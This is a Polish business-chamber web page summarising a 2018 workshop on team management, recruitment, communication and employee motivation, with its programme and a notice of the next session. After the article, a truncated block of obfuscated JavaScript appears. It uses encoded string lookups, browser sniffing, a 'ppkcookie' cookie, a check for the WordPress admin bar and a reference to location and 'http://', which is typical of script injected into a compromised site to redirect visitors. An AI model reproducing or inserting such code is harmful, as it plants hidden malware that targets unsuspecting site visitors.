Informacja po spotkaniu „Kierowanie zespołem (jak znaleźć i utrzymać pracownika) – warsztaty” | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!,

W dniu 21 marca 2018 o godzinie 10.00 rozpoczęło się kolejne spotkanie z naszego cyklu szkoleniowego. Warsztat poprowadziła Pani Anna Możdżyńska – absolwentka Akademii Trenera na WSB w Poznaniu. Trener, wykładowca, szkoleniowiec, pilot wycieczek, przewodnik turystyczny oraz szczęśliwa żona i mama 2 córek.

Nastał „czasach pracownika” dlatego ważne jest aby potrafić odpowiednio zarządzać zespołem, na co składają się systemy odpowiedniej komunikacji, egzekwowania zadań oraz motywacji. Skuteczna komunikacja oraz zarządzanie projektami to podstawa dobrze funkcjonującej firmy. Opóźnienia mogą spowodować problemy w realizacji działań na czas, a co za tym idzie, nawet utratę klienta. Dodatkowo, uporządkowane schematy mogą być znaczącym ułatwieniem pracy członków zespołu.

Program warsztatów:

  • Komunikacja jako narzędzie kreowania wizerunku firmy

–  Jakie ogłoszenia o pracę przyciągają wartościowych pracowników?
– Co chcesz zaoferować a czego wymagasz?

  • Komunikacja w zespole jako narzędzie kierowania

– model efektywnej komunikacji z zespołem
– zasady informacji zwrotnej
– eksperyment komunikacyjny – co się dzieje,
kiedy nie przestrzegamy podstawowych reguł komunikacyjnych?
– bariery komunikacyjne

  • Asertywne egzekwowanie zadań przez szefa

– co to znaczy asertywna postawa szefa
– stosowanie sankcji i bycie konsekwentnym
– rola komunikatu typu JA w komunikacji z pracownikiem

  • System wartości „szefa” (oczekiwania i wymagania stawiane pracownikom)

– komunikowanie wartości szefa
– zachęcanie do przestrzegania wartości szefa

  • Motywacja pozafinansowa, a finansowa – co działa skuteczniej?

– motywatory miękkie
– czego oczekuje pracownik?
– nagroda, czy kara – co jest skuteczniejsze ?

Zapraszamy Państwa na kolejne spotkanie spotkanie które poprowadzi Pani Anna Możdżyńska – 25 kwietnia br – „Zarządzanie czasem – organizacja pracy w przedsiębiorstwie – warsztaty”.

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m